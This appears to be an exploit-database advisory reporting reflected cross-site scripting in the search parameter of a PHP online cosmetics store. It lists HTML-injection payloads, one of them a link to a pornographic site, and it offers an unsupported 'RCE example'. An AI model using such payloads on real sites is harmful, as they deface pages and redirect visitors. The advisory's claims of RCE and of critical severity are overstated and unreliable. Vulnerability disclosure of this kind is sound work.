## Title: Cosmetics and Beauty Product Online Store v1.0 remote Multiple XSS-Reflected ## Author: nu11secur1ty ## Date: 02.18.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html ## CVE-Cosmetics and Beauty Product Online Store v1.0 ## Description: The `search` parameter from /cbpos/ app on Cosmetics and Beauty Product Online Store v1.0 appears to be vulnerable to multiple XSS-Reflected attacks. The attacker can take very sensitive information from the system and even he can prepare a very dangerous RCE by using this XSS vulnerability. Status: CRITICAL [+] Payloads: ```URL <a href="https://www.pornhub.com/">Please visit our beauty store!</a> <a href="https://www.nu11secur1ty.com/"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif"> ``` - RCE example: ```URL <a href="http://192.168.1.8/cbpos/uploads/product_4/banner.3.jpg"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif"> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store) ## Proof and Exploit: [href](https://streamable.com/sbzew8) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>